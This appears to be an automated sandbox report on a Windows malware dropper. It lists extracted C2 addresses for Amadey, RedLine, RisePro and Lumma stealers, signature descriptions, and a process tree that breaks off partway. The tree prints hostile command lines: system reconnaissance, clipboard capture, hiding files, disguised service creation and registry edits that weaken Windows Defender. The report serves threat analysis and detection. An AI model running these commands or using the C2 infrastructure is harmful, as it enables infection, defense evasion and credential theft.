Analysis

  • max time kernel
    143s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-06-2024 01:12

General

  • Target

    3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603.exe

  • Size

    1.8MB

  • MD5

    20fe52f3ba934b9b7454c194f44d74d0

  • SHA1

    f38c3041926f329dac459bacce67850dc58ab15a

  • SHA256

    3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603

  • SHA512

    de74eaa8fcd2dc40da40f09e4c69f41c63282c1d70f352fe3e6f0b7ef70318f5252e520574d428f1bd5c24dc6d55acab9f109b6a6c36718df1f9ead25effccfc

  • SSDEEP

    24576:1/JK2aIjA7qco3fFT9eSzR160c8LE8x+dyh9tfzHEBZ/QJc0erHIuoDaFtTNihZi:VlfA7kvFJRPpAC+UdTmtQCtouortLka

Malware Config

Extracted

Family

amadey

Version

4.21

Botnet

0e6740

C2

http://147.45.47.155

Attributes
  • install_dir

    9217037dc9

  • install_file

    explortu.exe

  • strings_key

    8e894a8a4a3d0da8924003a561cfb244

  • url_paths

    /ku4Nor9/index.php

rc4.plain

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

newbild

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

C2

185.172.128.33:8970

Extracted

Family

risepro

C2

77.91.77.66:58709

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.185.27.237:13528

Extracted

Family

lumma

C2

https://willingyhollowsk.shop/api

https://parallelmercywksoffw.shop/api

https://distincttangyflippan.shop/api

https://liabiliytshareodlkv.shop/api

https://macabrecondfucews.shop/api

https://notoriousdcellkw.shop/api

https://greentastellesqwm.shop/api

https://conferencefreckewl.shop/api

https://stickyyummyskiwffe.shop/api

https://flourhishdiscovrw.shop/api

https://landdumpycolorwskfw.shop/api

https://barebrilliancedkoso.shop/api

https://sturdyregularrmsnhw.shop/api

https://lamentablegapingkwaq.shop/api

https://innerverdanytiresw.shop/api

https://standingcomperewhitwo.shop/api

https://accumulationeyerwos.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 1 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 49 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 7 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 39 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603.exe
    "C:\Users\Admin\AppData\Local\Temp\3dca9b74c06babae491aef6495a256d6d26a4539cdc680b64ea4e0daee9cf603.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1572
    • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
      "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4012
      • C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        3⤵
          PID:1624
        • C:\Users\Admin\1000015002\c6df8df0dd.exe
          "C:\Users\Admin\1000015002\c6df8df0dd.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
            "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:1960
            • C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
              "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
              5⤵
              • Executes dropped EXE
              PID:5296
              • C:\Users\Admin\AppData\Local\Temp\onefile_5296_133634059971546416\stub.exe
                "C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:5460
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "ver"
                  7⤵
                    PID:5768
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                    7⤵
                      PID:5832
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic csproduct get uuid
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5928
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist"
                      7⤵
                        PID:5844
                        • C:\Windows\system32\tasklist.exe
                          tasklist
                          8⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5944
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                        7⤵
                        • Hide Artifacts: Hidden Files and Directories
                        PID:6020
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                          8⤵
                          • Views/modifies file attributes
                          PID:6064
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                        7⤵
                          PID:6080
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                          7⤵
                            PID:6088
                            • C:\Windows\system32\taskkill.exe
                              taskkill /F /IM chrome.exe
                              8⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:6132
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                            7⤵
                              PID:5528
                              • C:\Windows\system32\tasklist.exe
                                tasklist /FO LIST
                                8⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5748
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                              7⤵
                                PID:5512
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe Get-Clipboard
                                  8⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5824
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "chcp"
                                7⤵
                                  PID:5252
                                  • C:\Windows\system32\chcp.com
                                    chcp
                                    8⤵
                                      PID:5684
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "chcp"
                                    7⤵
                                      PID:5544
                                      • C:\Windows\system32\chcp.com
                                        chcp
                                        8⤵
                                          PID:5760
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                        7⤵
                                          PID:5928
                                          • C:\Windows\system32\netsh.exe
                                            netsh wlan show profiles
                                            8⤵
                                            • Event Triggered Execution: Netsh Helper DLL
                                            PID:5136
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                          7⤵
                                            PID:6068
                                            • C:\Windows\system32\systeminfo.exe
                                              systeminfo
                                              8⤵
                                              • Gathers system information
                                              PID:6116
                                            • C:\Windows\system32\HOSTNAME.EXE
                                              hostname
                                              8⤵
                                                PID:4208
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic logicaldisk get caption,description,providername
                                                8⤵
                                                • Collects information from the system
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4588
                                              • C:\Windows\system32\net.exe
                                                net user
                                                8⤵
                                                  PID:5148
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 user
                                                    9⤵
                                                      PID:5360
                                                  • C:\Windows\system32\query.exe
                                                    query user
                                                    8⤵
                                                      PID:5368
                                                      • C:\Windows\system32\quser.exe
                                                        "C:\Windows\system32\quser.exe"
                                                        9⤵
                                                          PID:5424
                                                      • C:\Windows\system32\net.exe
                                                        net localgroup
                                                        8⤵
                                                          PID:3224
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 localgroup
                                                            9⤵
                                                              PID:4040
                                                          • C:\Windows\system32\net.exe
                                                            net localgroup administrators
                                                            8⤵
                                                              PID:5764
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 localgroup administrators
                                                                9⤵
                                                                  PID:4988
                                                              • C:\Windows\system32\net.exe
                                                                net user guest
                                                                8⤵
                                                                  PID:2628
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user guest
                                                                    9⤵
                                                                      PID:2064
                                                                  • C:\Windows\system32\net.exe
                                                                    net user administrator
                                                                    8⤵
                                                                      PID:1096
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user administrator
                                                                        9⤵
                                                                          PID:5496
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic startup get caption,command
                                                                        8⤵
                                                                          PID:5232
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /svc
                                                                          8⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:4380
                                                                        • C:\Windows\system32\ipconfig.exe
                                                                          ipconfig /all
                                                                          8⤵
                                                                          • Gathers network information
                                                                          PID:1752
                                                                        • C:\Windows\system32\ROUTE.EXE
                                                                          route print
                                                                          8⤵
                                                                            PID:5948
                                                                          • C:\Windows\system32\ARP.EXE
                                                                            arp -a
                                                                            8⤵
                                                                              PID:5776
                                                                            • C:\Windows\system32\NETSTAT.EXE
                                                                              netstat -ano
                                                                              8⤵
                                                                              • Gathers network information
                                                                              PID:5672
                                                                            • C:\Windows\system32\sc.exe
                                                                              sc query type= service state= all
                                                                              8⤵
                                                                              • Launches sc.exe
                                                                              PID:6016
                                                                            • C:\Windows\system32\netsh.exe
                                                                              netsh firewall show state
                                                                              8⤵
                                                                              • Modifies Windows Firewall
                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                              PID:4576
                                                                            • C:\Windows\system32\netsh.exe
                                                                              netsh firewall show config
                                                                              8⤵
                                                                              • Modifies Windows Firewall
                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                              PID:960
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            7⤵
                                                                              PID:5932
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic csproduct get uuid
                                                                                8⤵
                                                                                  PID:1260
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                7⤵
                                                                                  PID:5468
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic csproduct get uuid
                                                                                    8⤵
                                                                                      PID:5756
                                                                              • C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:5596
                                                                              • C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5336
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  6⤵
                                                                                    PID:5936
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    6⤵
                                                                                    • Checks computer location settings
                                                                                    PID:5916
                                                                                    • C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5212
                                                                                    • C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:6096
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000025001\deep.exe"
                                                                                  5⤵
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  PID:4388
                                                                                  • C:\Users\Admin\AppData\Local\Temp\da_protected.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\da_protected.exe"
                                                                                    6⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:3012
                                                                                    • C:\Users\Admin\AppData\Local\Temp\thqphu.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\thqphu.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1012
                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                        setup.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5708
                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup-b14fc3967d0e1f52\setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup-b14fc3967d0e1f52\setup.exe"
                                                                                          9⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in System32 directory
                                                                                          PID:5484
                                                                                          • C:\Windows\system32\winsvc.exe
                                                                                            "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-b14fc3967d0e1f52\setup.exe"
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:6100
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
                                                                                              11⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:6080
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
                                                                                                12⤵
                                                                                                • Launches sc.exe
                                                                                                PID:6008
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
                                                                                              11⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:1216
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
                                                                                                12⤵
                                                                                                • Launches sc.exe
                                                                                                PID:5380
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
                                                                                              11⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:5300
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
                                                                                                12⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2072
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
                                                                                              11⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:4040
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                "C:\Windows\system32\sc.exe" start winsvc
                                                                                                12⤵
                                                                                                • Launches sc.exe
                                                                                                PID:3144
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3292
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    6⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5168
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5564
                                                                                • C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1652
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                    6⤵
                                                                                      PID:3500
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
                                                                                    5⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Windows directory
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:6044
                                                                                    • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                                                                                      6⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      PID:5704
                                                                                      • C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\1000005001\setup.exe"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:2984
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSF482.tmp\Install.exe
                                                                                          .\Install.exe
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5624
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSF695.tmp\Install.exe
                                                                                            .\Install.exe /dfukLdidqzt "385119" /S
                                                                                            9⤵
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Enumerates system info in registry
                                                                                            PID:5912
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                              10⤵
                                                                                                PID:5816
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                  11⤵
                                                                                                    PID:5944
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                      12⤵
                                                                                                        PID:5168
                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                          13⤵
                                                                                                            PID:4676
                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                        11⤵
                                                                                                          PID:5052
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                            12⤵
                                                                                                              PID:3340
                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                13⤵
                                                                                                                  PID:5616
                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                              11⤵
                                                                                                                PID:4388
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                  12⤵
                                                                                                                    PID:4588
                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                      13⤵
                                                                                                                        PID:5476
                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                    11⤵
                                                                                                                      PID:2660
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
